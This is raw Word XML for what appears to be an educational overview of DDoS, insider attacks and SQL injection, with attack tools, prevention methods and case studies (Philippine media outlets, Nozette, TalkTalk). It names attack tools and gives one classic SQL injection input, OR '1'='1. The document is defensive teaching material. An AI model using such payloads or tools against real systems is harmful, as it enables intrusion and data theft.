          <w:numId w:val="26"/>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Volume-Based Attack Tools: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LOIC, HOIC, RUDY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="50A911D4" w14:textId="00BF5F7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>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Botnet Tools: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Mirai Botnet, Xerxes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="58337124" w14:textId="0759BD19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>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Security Testing Tools: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Hping3, Metasploit auxiliary modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="4EB3D5FA" w14:textId="1DE0A1A0">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Methods of Preventing DDoS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="53A7C831" w14:textId="28449F1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Network Protection: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Firewalls, IDS/IPS, Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="6914F058" w14:textId="5A982420">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Load Distribution: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CDN, Load Balancer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="2817B292" w14:textId="1907E698">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Performance Monitoring:</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Traffic monitoring, anomaly detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1E8C226A" w14:textId="530340CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Emergency Preparedness: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DDoS response plan, ISP collaboration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="37C60BA0" w14:textId="2D6D9186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Advanced Protection Services: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Cloudflare, Akamai, AWS Shield</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="2E939BCD" w14:textId="70E9F33F">
      <w:p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Case Study – Philippine Alternative Media (2018–2019):</w:t>
      </w:r>
      <w:r>
        <w:br/>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Between 2018 and 2019, several independent media outlets in the Philippines—including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Bulatlat</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and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Pinoy Weekly</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>—faced coordinated DDoS attacks believed to be politically motivated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="44D83EC9" w14:textId="588DE691">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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Impact:</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Websites were taken offline, affecting their ability to publish news and accept donations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="710CD303" w14:textId="0D271654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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Response:</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Migration to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VirtualRoad</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 xml:space="preserve">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Qurium</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 xml:space="preserve"> Media Foundation)</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allowed for forensic analysis and eventual legal action against the responsible IT firms.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1180CC61" w14:textId="684070AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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Outcome:</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Agreement reached in 2020; companies pledged support for press freedom and improved defense mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7D4D3442" w14:textId="06A4DB5C">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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="26800B8A" w14:textId="195E7616">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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Utilize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Content Delivery Networks (CDNs)</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and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load balancers</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0ED813A0" w14:textId="0259A371">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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Implement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rate limiting</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and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traffic filtering</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(firewalls, IDS/IPS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1463C90F" w14:textId="277E3866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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Establish a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DDoS Response Plan</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and coordinate with ISPs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="0916BA7E" w14:textId="26389EAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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Deploy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cloud-based protection</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such as Cloudflare or AWS Shield.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="56FC83C0" w14:textId="0E766262">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="2ADC615A" w14:textId="09521A96">
      <w:pPr>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p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7823B1A6" w14:textId="6EE38AF3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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32"/>
          <w:szCs w:val="32"/>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32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Insider Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="46137BD7" w14:textId="4CC25967">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Definition of Insider Attack</w:t>
      </w:r>
      <w:r>
        <w:br/>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An Insider Attack is carried out by an employee or internal person with legitimate access to systems or data who exploits privileges for malicious purposes like data theft, sabotage, or espionage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1BA2BFA8" w14:textId="72816189">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Features:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="37CDEE06" w14:textId="51EF373E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>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The attacker knows the internal structure of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1345E3B4" w14:textId="50B42216">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>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Often intentional or due to negligence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="213A5AC8" w14:textId="6BF40CDA">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Methods of Executing Insider Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1A11792A" w14:textId="53C1CD05">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A. Unauthorized Access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 Access data/systems not allowed.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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B. Data Exfiltration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 Copy and send confidential data outside.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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C. System Sabotage</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 Delete or modify data, disrupt services.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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 Internal Espionage</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 Gather sensitive info and sell it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="0EE97DD7" w14:textId="4F44449F">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Tools Used in Insider Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="216404BF" w14:textId="2BB0D3CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Information Gathering:</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Keyloggers, Screen Capture, Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="59B86043" w14:textId="37F079A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Data Exfiltration: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USB Drives, Cloud Storage, Email/Messaging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7A91B416" w14:textId="2E1F49E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>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Internal Exploitation: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Mimikatz</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PowerShell Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="60C5F35F" w14:textId="68A64661">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Social Engineering / Psychological Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="298C9ED8" w14:textId="5D8A8DA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Job Exploitation, Trust Exploitation, Blackmail/Pressure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7E287CDF" w14:textId="5AC81B9A">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Methods of Preventing Insider Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="6F407FCA" w14:textId="00AF9D8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Privilege Control:</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Least Privilege,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monitor</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access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="47A23CE7" w14:textId="20E71D63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Monitoring &amp; Auditing:</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Audit logs, User Behavior Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="04FD358C" w14:textId="155CB0B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Awareness &amp; Training:</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Security training, reporting culture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="0FA7B917" w14:textId="26A9583D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Strict Policies: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Data access policies, restrict personal devices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1AE9E6DE" w14:textId="620C527D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Technical Tools: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DLP, Endpoint Monitoring, SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="2B982FAE" w14:textId="1A184C13">
      <w:p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 xml:space="preserve">Case Study – Stewart David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Nozette</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 xml:space="preserve"> (U.S. Government Insider Threat):</w:t>
      </w:r>
      <w:r>
        <w:br/>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w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nozette</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 NASA contractor with top-secret clearance, misused his access to defraud U.S. government agencies and </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attempted</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to sell classified data to a foreign intelligence service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="20897B73" w14:textId="264A33DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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Impact:</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National security compromise and multi-agency fraud.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="137DDE14" w14:textId="194E91BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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Outcome:</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Sentenced to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13 years in prison</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for attempted espionage, fraud, and tax evasion.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7C1DC067" w14:textId="01CD4614">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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Lessons Learned:</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Insider attacks can bypass perimeter defenses; strong internal monitoring and behavior analytics are essential.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="6D7A38B5" w14:textId="147CDF53">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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="0FEA7131" w14:textId="6477C941">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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Apply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Least Privilege Access (LPA)</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principles.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="4175251A" w14:textId="32CDF310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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Monitor activities via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User Behavior Analytics (UBA)</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and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SIEM systems</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2E759D7B" w14:textId="4201D003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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Conduct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employee background checks and awareness training</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45FD5886" w14:textId="520375FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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Enforce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strict data access and removable media policies</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166587AE" w:rsidRDefault="43418316" w14:paraId="1196DF27" w14:textId="1CDAC6FA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>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32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="67284CE6" w14:textId="2F9A25AC">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Definition of SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:br/>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SQL Injection is an attack on web applications where an attacker enters malicious SQL queries in input fields to manipulate the database and access or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modify</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sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="43536457" w14:textId="06D405DF">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Features:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="411553EF" w14:textId="486F1233">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Exploits applications that do not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validate</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input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="617E4FDF" w14:textId="38EDE2AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Can expose passwords, customer data, or full database control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7A9365E2" w14:textId="50B6301D">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Methods of Executing SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7BAD52A1" w14:textId="7979AA26">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A. Classic SQL Injection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 Enter SQL directly in fields, e.g.,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OR '1'='1</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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B. Blind SQL Injection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 Use true/false queries to extract info gradually.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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C. Error-Based SQL Injection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 Exploit database error messages.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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D. Union-Based SQL Injection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 Use UNION to combine query results.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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E. Time-Based SQL Injection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 Rely on response delays.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="30740A19" w14:textId="41DEE1BC">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Tools Used in SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="0A99C059" w14:textId="4D6802E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Vulnerability Discovery:</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sqlmap</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Havij</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jSQL</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Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7AAC2597" w14:textId="4D3A3F03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Supporting Tools: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Burp Suite, OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="42C703B8" w14:textId="105D3AAA">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Social Engineering Aspect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="617A61ED" w14:textId="48AA1D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Exploit developer mistakes or insecure design.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="30A95EA3" w14:textId="729D11CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Trick employees into </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submitting</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queries via forms or links.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="778B2FAB" w14:textId="22E557F7">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Methods of Preventing SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="5430C730" w14:textId="6C57D049">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Input Validation:</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Sanitize/</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validate</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input</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="3F96958E" w14:textId="417EB5C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Prepared Statements:</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Parameterized queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="68F12ACB" w14:textId="25E6B626">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Use ORM/Security Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="3DF0511D" w14:textId="5C2B4A94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Limit Database Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="1F163C9E" w14:textId="471587AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Monitoring &amp; Auditing:</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">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t xml:space="preserve"> Logs, WAF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="0FB2E17B" w14:textId="629156A1">
      <w:p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Case Study – TalkTalk Data Breach (2015):</w:t>
      </w:r>
      <w:r>
        <w:br/>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In 2015, the UK telecom company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TalkTalk</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suffered a massive SQL injection attack exposing data of over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150,000 customers</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6061ED05" w14:textId="41076DAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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Method:</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Attackers exploited an unpatched web page vulnerable to SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="0D9F10B6" w14:textId="43FBD6EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Financial and personal data </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="5359D050">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>leaks</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, £60 million in damages, and major reputational harm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="51040623" w14:textId="7F05D6E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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Outcome:</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The company was fined £400,000 by the UK Information Commissioner’s Office (ICO).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="4E8E17EC" w14:textId="5B77F97B">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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="5453A009" w14:textId="3079BC31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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Validate and sanitize all user inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="7A49E284" w14:textId="41424707">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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Use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parameterized queries</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and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prepared statements</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56AC948D" w14:textId="1BF7CEFA">
      <w:pPr>
